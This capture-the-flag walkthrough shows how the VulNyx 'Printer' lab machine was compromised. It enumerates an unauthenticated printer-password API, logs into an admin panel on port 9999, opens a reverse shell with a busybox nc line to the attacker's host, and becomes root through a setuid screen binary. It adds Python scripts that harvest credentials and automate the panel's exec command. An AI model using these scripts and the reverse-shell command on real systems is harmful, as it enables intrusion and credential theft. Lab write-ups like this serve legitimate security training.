Information

Printer is an easy-difficulty vulnerable Linux virtual machine from the VulNyx platform. It was created by the user d4t4s3c and runs correctly on the VirtualBox and VMware hypervisors.


Enumeration

Nmap

TCP

 nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.120
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-09 12:21 CEST
Nmap scan report for 192.168.1.120
Host is up (0.00015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9999/tcp open  abyss
 nmap -sVC -p22,80,9999 192.168.1.120
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-09 12:28 CEST
Nmap scan report for 192.168.1.120
Host is up (0.00029s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp   open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Debian Default Page: It works
9999/tcp open  abyss?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: 
|     Konica Minolta Printer Admin Panel
|     Password:
|   NULL: 
|_    Konica Minolta Printer Admin Panel
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.95%I=7%D=7/9%Time=686E4462%P=x86_64-pc-linux-gnu%r(NUL
SF:L,25,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel\n\n")%r(GetReque
SF:st,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassword:\x2
SF:0")%r(HTTPOptions,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel\
SF:n\nPassword:\x20")%r(FourOhFourRequest,2F,"\nKonica\x20Minolta\x20Print
SF:er\x20Admin\x20Panel\n\nPassword:\x20")%r(JavaRMI,2F,"\nKonica\x20Minol
SF:ta\x20Printer\x20Admin\x20Panel\n\nPassword:\x20")%r(GenericLines,2F,"\
SF:nKonica\x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassword:\x20")%r(RT
SF:SPRequest,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassw
SF:ord:\x20")%r(RPCCheck,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Pa
SF:nel\n\nPassword:\x20")%r(DNSVersionBindReqTCP,2F,"\nKonica\x20Minolta\x
SF:20Printer\x20Admin\x20Panel\n\nPassword:\x20")%r(DNSStatusRequestTCP,2F
SF:,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassword:\x20")%r
SF:(Help,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassword:
SF:\x20")%r(SSLSessionReq,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20P
SF:anel\n\nPassword:\x20")%r(TerminalServerCookie,2F,"\nKonica\x20Minolta\
SF:x20Printer\x20Admin\x20Panel\n\nPassword:\x20")%r(TLSSessionReq,2F,"\nK
SF:onica\x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassword:\x20")%r(Kerb
SF:eros,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassword:\
SF:x20")%r(SMBProgNeg,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel
SF:\n\nPassword:\x20")%r(X11Probe,2F,"\nKonica\x20Minolta\x20Printer\x20Ad
SF:min\x20Panel\n\nPassword:\x20")%r(LPDString,2F,"\nKonica\x20Minolta\x20
SF:Printer\x20Admin\x20Panel\n\nPassword:\x20")%r(LDAPSearchReq,2F,"\nKoni
SF:ca\x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassword:\x20")%r(LDAPBin
SF:dReq,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassword:\
SF:x20")%r(SIPOptions,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel
SF:\n\nPassword:\x20")%r(LANDesk-RC,2F,"\nKonica\x20Minolta\x20Printer\x20
SF:Admin\x20Panel\n\nPassword:\x20")%r(TerminalServer,2F,"\nKonica\x20Mino
SF:lta\x20Printer\x20Admin\x20Panel\n\nPassword:\x20")%r(NCP,2F,"\nKonica\
SF:x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassword:\x20");

Shell (printer)

80/TCP (HTTP)

Site (/)

Directory Brute Force
 gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.120/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.120/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/api                  (Status: 301) [Size: 312] [--> http://192.168.1.120/api/]
/server-status        (Status: 403) [Size: 278]
Progress: 220545 / 220546 (100.00%)
===============================================================
Finished
===============================================================

Site (/api)

Directory Brute Force
 gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.120/api
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.120/api
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/printers             (Status: 301) [Size: 321] [--> http://192.168.1.120/api/printers/]
Progress: 220545 / 220546 (100.00%)
===============================================================
Finished
===============================================================

Site (/api/printers)

ID & Extension Brute Force
 wfuzz -c --hc=404 -z range,1-5000 -z list,json-yml -u "http://192.168.1.120/api/printers/printerFUZZ.FUZ2Z" 2>/dev/null
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.1.120/api/printers/printerFUZZ.FUZ2Z
Total requests: 10000

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                 
=====================================================================

000000001:   200        6 L      9 W        82 Ch       "1 - json"                                                                                                              
000000007:   200        6 L      9 W        78 Ch       "4 - json"                                                                                                              
000000003:   200        6 L      9 W        80 Ch       "2 - json"                                                                                                              
000000009:   200        6 L      9 W        77 Ch       "5 - json"                                                                                                              
000000005:   200        6 L      9 W        79 Ch       "3 - json"                                                                                                              
000003197:   200        6 L      9 W        97 Ch       "1599 - json"                                                                                                           

Total time: 4.607142
Processed Requests: 10000
Filtered Requests: 9994
Requests/sec.: 2170.542

I send a GET request for each of the IDs found and obtain the printer passwords. Note that the endpoint requires no authentication: the only thing protecting each record is guessing its numeric ID.

 for i in 1 2 3 4 5 1599; do curl -sX GET "http://192.168.1.120/api/printers/printer$i.json" ;done

{
  "printer": {
    "printer_id": "1",
    "printer_password": "P4ssw0rd!"
  }
}
{
  "printer": {
    "printer_id": "2",
    "printer_password": "iloveme"
  }
}
{
  "printer": {
    "printer_id": "3",
    "printer_password": "qwerty"
  }
}
{
  "printer": {
    "printer_id": "4",
    "printer_password": "admin"
  }
}
{
  "printer": {
    "printer_id": "5",
    "printer_password": "root"
  }
}
{
  "printer": {
    "printer_id": "1599",
    "printer_password": "$3cUr3Pr1nT3RP4ZZw0rD"
  }
}
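The curl loop above can be turned into a small enumerator. The following is an added example and is not part of the original writeup: it walks the same `/api/printers/printer<ID>.<ext>` space that the wfuzz run covered, keeps only 200 responses whose body parses as the `{"printer": {...}}` document shown above, and returns an id-to-password map. `http_fetch` uses the standard library against a live target; `sample_fetch` is a constructed offline stand-in that replays the six records seen on the page, so the script runs without the VM.

```python
import json
import re
import urllib.error
import urllib.request


def http_fetch(url):
    """GET `url` and return (status, body). HTTP errors such as 404 are
    returned as a status instead of raised, so the caller can filter them."""
    try:
        with urllib.request.urlopen(url, timeout=5) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, ""


def parse_printer_record(body):
    """Parse the {"printer": {"printer_id": ..., "printer_password": ...}}
    document the API returns; None if the body is not that shape."""
    try:
        rec = json.loads(body)["printer"]
        return str(rec["printer_id"]), str(rec["printer_password"])
    except (ValueError, KeyError, TypeError):
        return None


def harvest_printers(base_url, ids, exts=("json", "yml"), fetch=http_fetch):
    """Request every id/extension pair (the same space wfuzz covered) and
    collect credentials from the records that exist. Returns
    {printer_id: printer_password}; only 200s that parse are kept, so the
    404s that wfuzz filtered with --hc=404 are dropped here as well."""
    found = {}
    for printer_id in ids:
        for ext in exts:
            status, body = fetch(f"{base_url}/api/printers/printer{printer_id}.{ext}")
            if status != 200:
                continue
            parsed = parse_printer_record(body)
            if parsed:
                found[parsed[0]] = parsed[1]
    return found


# --- constructed offline stand-in: replays the six records shown on the page ---
SAMPLE_RECORDS = {
    "1": "P4ssw0rd!", "2": "iloveme", "3": "qwerty",
    "4": "admin", "5": "root", "1599": "$3cUr3Pr1nT3RP4ZZw0rD",
}


def sample_fetch(url):
    """Behaves like http_fetch against the VM: 200 + JSON for known ids
    with the .json extension, 404 for everything else (.yml included)."""
    match = re.search(r"/printer(\d+)\.json$", url)
    if match and match.group(1) in SAMPLE_RECORDS:
        pid = match.group(1)
        body = json.dumps({"printer": {"printer_id": pid,
                                       "printer_password": SAMPLE_RECORDS[pid]}})
        return 200, body
    return 404, ""


if __name__ == "__main__":
    import sys
    # python3 harvest.py http://192.168.1.120   (no argument: run against the stand-in)
    target = sys.argv[1] if len(sys.argv) > 1 else None
    fetch = http_fetch if target else sample_fetch
    found = harvest_printers(target or "http://192.168.1.120", range(1, 5001), fetch=fetch)
    for pid, pw in sorted(found.items(), key=lambda kv: int(kv[0])):
        print(f"printer {pid}: {pw}")
```

Against the real box the 10,000 requests take a few seconds, as the wfuzz run did; the point of parsing instead of `cat`-ing is that a 200 with an unexpected body (a changed schema, an error page served with the wrong status) is skipped rather than silently mixed into the credential list.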

9999/TCP (PRINTER)

I connect to the printer successfully with the password $3cUr3Pr1nT3RP4ZZw0rD

 nc -vn 192.168.1.120 9999
(UNKNOWN) [192.168.1.120] 9999 (?) open

Konica Minolta Printer Admin Panel


Password: $3cUr3Pr1nT3RP4ZZw0rD

Please type "?" for HELP
> 

I type ? to display the HELP and notice the exec function, which runs arbitrary system commands on the host

> ?

To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>

Parameter-name Type of value
ip: IP-address in dotted notation
subnet-mask: address in dotted notation (enter 0 for default)
default-gw: address in dotted notation (enter 0 for default)
syslog-svr: address in dotted notation (enter 0 for default)
idle-timeout: seconds in integers
set-cmnty-name: alpha-numeric string (32 chars max)
host-name: alpha-numeric string (upper case only, 32 chars max)
dhcp-config: 0 to disable, 1 to enable
allow: <ip> [mask] (0 to clear, list to display, 10 max)

addrawport: <TCP port num> (<TCP port num> 3000-9000)
deleterawport: <TCP port num>
listrawport: (No parameter required)

exec: execute system commands (exec id)
exit: quit from telnet session
> 

Reverse Shell

I get a shell as the printer user

> exec busybox nc 192.168.1.5 443 -e /bin/sh

 nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.5] from (UNKNOWN) [192.168.1.120] 52164
id ; hostname
uid=1000(printer) gid=1000(printer) grupos=1000(printer)
printer
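The dialogue with port 9999 (banner, password prompt, `> ` prompt, `exec` verb) is easy to script once the prompts are known. The following is an added example and is not part of the original writeup: `panel_exec` connects, waits for `Password: `, authenticates, waits for `> ` and sends a single `exec` line, returning whatever the panel prints back. `start_mock_panel` is a constructed stand-in that replays the banner and prompts observed via nmap and nc so the client can be exercised offline; its `Access denied` text and `[mock] would run:` echo are invented for the mock, since the real panel's output after `exec` was not captured on the page (the command there was a reverse shell, which never returns to the prompt).

```python
import socket
import threading

# Strings observed on the real service (nmap fingerprint and the nc session).
BANNER = "\nKonica Minolta Printer Admin Panel\n\n"
PASSWORD_PROMPT = "Password: "
HELP_HINT = '\nPlease type "?" for HELP\n'
PROMPT = "> "


def _recv_until(sock, marker, timeout=3.0):
    """Read until `marker` shows up, the peer closes, or `timeout` passes.
    A timeout is not an error here: an exec that spawns a reverse shell never
    returns to the prompt, so the caller just gets whatever arrived so far."""
    sock.settimeout(timeout)
    buf = b""
    want = marker.encode()
    while want not in buf:
        try:
            chunk = sock.recv(4096)
        except socket.timeout:
            break
        if not chunk:
            break
        buf += chunk
    return buf.decode(errors="replace")


def panel_exec(host, port, password, command):
    """Authenticate to the admin panel and run `command` via its exec verb.
    Returns the panel's reply; raises RuntimeError if login did not yield '> '."""
    with socket.create_connection((host, port), timeout=5) as s:
        _recv_until(s, PASSWORD_PROMPT)
        s.sendall(password.encode() + b"\n")
        if PROMPT not in _recv_until(s, PROMPT):
            raise RuntimeError("login failed: no command prompt after password")
        s.sendall(f"exec {command}\n".encode())
        return _recv_until(s, PROMPT)


def start_mock_panel(password, log):
    """Constructed stand-in for the real port-9999 service (offline use only).
    Serves one client on 127.0.0.1, appends each command line to `log`, and
    returns the ephemeral port it listens on."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        srv.close()
        with conn, conn.makefile("rb") as lines:
            conn.sendall((BANNER + PASSWORD_PROMPT).encode())
            if lines.readline().decode().strip() != password:
                conn.sendall(b"Access denied\n")   # invented: real text not observed
                return
            conn.sendall((HELP_HINT + PROMPT).encode())
            for raw in lines:
                text = raw.decode().strip()
                log.append(text)
                if text == "exit":
                    return
                if text.startswith("exec "):
                    # invented echo; the real panel's exec output was not captured
                    conn.sendall(b"[mock] would run: " + text[5:].encode() + b"\n")
                conn.sendall(PROMPT.encode())

    threading.Thread(target=serve, daemon=True).start()
    return port


if __name__ == "__main__":
    import sys
    if len(sys.argv) >= 5:   # python3 panel.py <host> <port> <password> <cmd...>
        print(panel_exec(sys.argv[1], int(sys.argv[2]), sys.argv[3], " ".join(sys.argv[4:])))
    else:                    # no target given: exercise the client against the mock
        seen = []
        port = start_mock_panel("$3cUr3Pr1nT3RP4ZZw0rD", seen)
        print(panel_exec("127.0.0.1", port, "$3cUr3Pr1nT3RP4ZZw0rD", "id"))
        print("mock received:", seen)
```

The client deliberately treats a read timeout after `exec` as success rather than failure: with the reverse-shell payload used above the panel blocks until the shell exits, so a strict "wait for the next prompt" loop would hang forever.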

Privilege Escalation

Enumeration

SUID

The screen binary is owned by root and has mode 4755 (SUID bit set), so the printer user can execute it with root's effective UID.

(This allows running the binary in the context of its owner, which in this case is root. On Debian the package installs screen as root:utmp with mode 2755, setgid utmp rather than setuid root, so the setuid bit here is a deliberate misconfiguration.)

printer@printer:~$ find / -perm -4000 2>/dev/null
/usr/bin/mount
/usr/bin/su
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/umount
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/screen
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

printer@printer:~$ ls -l /usr/bin/screen
-rwsr-xr-x 1 root root 482312 feb 27  2021 /usr/bin/screen

Processes

The root user has a detached screen session named root; the loop below recreates it every second whenever /var/run/screen/S-root/ is empty

printer@printer:~$ ps aux |grep "screen"
root         325  0.0  0.0   2484   408 ?        Ss   12:19   0:00 /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done

Abuse

Reviewing the screen help I see the -x flag, which allows attaching to an active session

-x Attach to a not detached screen. (Multi display mode).

I become root by attaching to the session

printer@printer:~$ screen -x root/
root@printer:~# id ; hostname
uid=0(root) gid=0(root) grupos=0(root)
printer
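An added example, not from the writeup: a local check for the two conditions abused above, a setuid-root screen and a screen socket directory belonging to another user. It takes the stat and listdir functions as parameters so the same logic runs against the real filesystem (the defaults) or against a constructed snapshot of this box for offline use. The expected Debian mode (2755, root:utmp) is the assumed baseline the check compares against, and the socket name `337.root` in the snapshot is constructed, not taken from the box.

```python
import os
import stat
from collections import namedtuple

# Debian ships /usr/bin/screen as root:utmp mode 2755 (setgid utmp, so it can
# write utmp); a setuid-root copy is a deviation worth flagging. (Assumed baseline.)
EXPECTED_SCREEN_MODE = 0o2755
FakeStat = namedtuple("FakeStat", "st_mode st_uid st_gid")


def screen_privesc_findings(screen_path="/usr/bin/screen",
                            socket_root="/var/run/screen",
                            me="printer",
                            stat_fn=os.stat, listdir_fn=os.listdir):
    """Return a list of human-readable findings describing why `screen -x`
    could hand the current user another user's session."""
    findings = []
    st = stat_fn(screen_path)
    mode = stat.S_IMODE(st.st_mode)
    suid_root = bool(mode & stat.S_ISUID) and st.st_uid == 0
    if suid_root:
        findings.append(f"{screen_path} is setuid root (mode {mode:o}); "
                        f"expected {EXPECTED_SCREEN_MODE:o} root:utmp")
    # Each user's sessions live under <socket_root>/S-<user>/<pid>.<name>.
    # Those directories are normally 0700; a setuid-root screen can open them.
    for entry in listdir_fn(socket_root):
        if not entry.startswith("S-") or entry == f"S-{me}":
            continue
        owner = entry[2:]
        for sess in listdir_fn(os.path.join(socket_root, entry)):
            name = sess.split(".", 1)[-1]
            verdict = ("reachable through the setuid screen" if suid_root
                       else "directory is normally 0700, likely not reachable")
            findings.append(f"session '{name}' of {owner} in {socket_root}/{entry}: "
                            f"try `screen -x {owner}/` ({verdict})")
    return findings


# Constructed snapshot of this box for offline use (values mirror the writeup:
# mode 4755 root:root on screen, a root session created by `screen -dmS root`).
SNAPSHOT_STAT = {"/usr/bin/screen": FakeStat(stat.S_IFREG | 0o4755, 0, 0)}
SNAPSHOT_DIRS = {
    "/var/run/screen": ["S-root", "S-printer"],
    "/var/run/screen/S-root": ["337.root"],   # constructed <pid>.<name> socket
    "/var/run/screen/S-printer": [],
}


def snapshot_findings():
    """Run the check against the constructed snapshot instead of the live box."""
    return screen_privesc_findings(stat_fn=SNAPSHOT_STAT.__getitem__,
                                   listdir_fn=SNAPSHOT_DIRS.__getitem__)


if __name__ == "__main__":
    # On a real host: inspect /usr/bin/screen and /var/run/screen as the current user.
    for line in screen_privesc_findings(me=os.environ.get("USER", "")):
        print(line)
```

The remediation the check implies is the Debian default it compares against: drop the setuid bit (mode 2755, group utmp) so that another user's 0700 socket directory is no longer reachable through the binary.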

Flags

Now as root I can read the user.txt and root.txt flags

root@printer:~# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
616e****************************
7cc6****************************

That concludes the walkthrough of the Printer machine.

Happy Hacking!